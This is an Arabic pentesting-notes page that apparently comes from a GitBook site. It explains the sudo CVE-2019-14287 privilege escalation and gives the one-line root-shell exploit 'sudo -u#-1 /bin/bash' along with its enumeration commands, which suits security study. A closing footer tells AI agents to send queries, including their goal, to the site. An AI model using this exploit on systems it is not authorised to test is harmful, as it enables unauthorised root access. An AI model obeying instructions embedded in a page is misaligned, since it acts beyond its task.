> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/privesc/sudoers/sudo-version-vulnerabilities-linux-privilege-escalation/sudo-version-1.8.27-cve-2019-14287.md).

# sudo 1.8.27 CVE-2019-14287

## ما هو

يبدأ تصعيد الامتيازات في sudoers بالأوامر التي يمكن للمستخدم تشغيلها عبر `sudo`. يمكن للثنائيات المهيأة بشكل خاطئ، ومعاملات البرامج النصية غير الآمنة، ومعالجة الروابط الرمزية، وإصدارات sudo الضعيفة أن تحول صلاحيات sudo المحدودة إلى غلاف root. تركز هذه الصفحة تحديدًا على **sudo 1.8.27 \[CVE-2019-14287]** وتحافظ على سير الاستغلال بشكل عملي: حدّد الحالة، تحقّق منها بأمان، ثم شغّل أصغر حمولة لازمة لإثبات الأثر.

## الاستكشاف

ابدأ بتأكيد السياق المحلي والتهيئة الخاطئة الدقيقة قبل تشغيل مسار الاستغلال.

```bash
sudo -l
sudo --version
```

## أمثلة

### استغلال صلاحيات sudo (CVE-2019-14287):

عند فحص صلاحيات sudo، اكتشفنا إعدادًا ضعيفًا في ملف sudoers. باستخدام `sudo -l` الأمر، حددنا امتيازًا للاتصال بجميع المستخدمين، باستثناء `root`، باستخدام `/bin/bash` الأمر:

<figure><img src="/files/5218e35e5be7a4c8f4c0fdd49dac2b3d7f2babfc" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.exploit-db.com/exploits/47502>" %}

تؤثر هذه الثغرة على جميع إصدارات sudo الأقدم من 1.8.27.

في حالتنا، إصدار sudo أقل من 1.8.27، مما يجعل هذه الثغرة قابلة للاستغلال.

<figure><img src="/files/1df225a34fbd7f4ce386d2ce3c472e95d75cafd5" alt="" width="510"><figcaption></figcaption></figure>

لاستغلال هذه الثغرة، ما عليك سوى تنفيذ الأمر التالي:

```bash
sudo -u#-1 /bin/bash
```

يتيح لك هذا الأمر تشغيل صدفة كمستخدم `-1`، والذي يقابل المستخدم `root`.

<figure><img src="/files/018254a1d4dc3872c6491ec592fdf4c9a80b242f" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/privesc/sudoers/sudo-version-vulnerabilities-linux-privilege-escalation/sudo-version-1.8.27-cve-2019-14287.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
